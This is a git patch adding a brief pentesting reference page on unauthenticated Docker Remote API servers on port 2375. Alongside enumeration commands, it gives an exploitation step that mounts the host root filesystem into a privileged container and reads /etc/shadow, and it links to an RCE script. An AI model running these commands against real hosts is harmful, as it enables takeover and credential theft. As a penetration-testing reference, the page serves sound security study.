From 4b9384c19ae1534f933f4526b78e0058c2864ec6 Mon Sep 17 00:00:00 2001
From: Nicolas Krassas <dinosn@gmail.com>
Date: Tue, 15 Dec 2020 09:31:28 +0200
Subject: [PATCH] 2375-pentesting-docker

Adding information on pentesting Docker Remote API
---
 pentesting/2375-pentesting-docker | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 pentesting/2375-pentesting-docker

diff --git a/pentesting/2375-pentesting-docker b/pentesting/2375-pentesting-docker
new file mode 100644
index 00000000..0c336e7e
--- /dev/null
+++ b/pentesting/2375-pentesting-docker
@@ -0,0 +1,29 @@
+# 2375 - Pentesting Docker API 
+
+## Basic Information
+
+Remote API is running by default on 2375 port when enabled.  The service by default will not require authentication allowing an attacker to start a priviledged docker container. By using the Remote API one can attach hosts / \(root directory\) to the container and read/write files of the host\'s environment.
+
+**Default port:** 2375
+
+```text
+PORT    STATE SERVICE
+2375/tcp open  docker
+```
+
+## Enumeration
+
+```bash
+msf> use exploit/linux/http/docker_daemon_tcp
+nmap -sV --script "docker-*" -p <PORT> <IP>
+```
+
+## Exploitation
+
+Check if it's vulnerable to execute arbitrary code:
+```text
+docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
+cat /mnt/etc/shadow
+```
+
+* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py)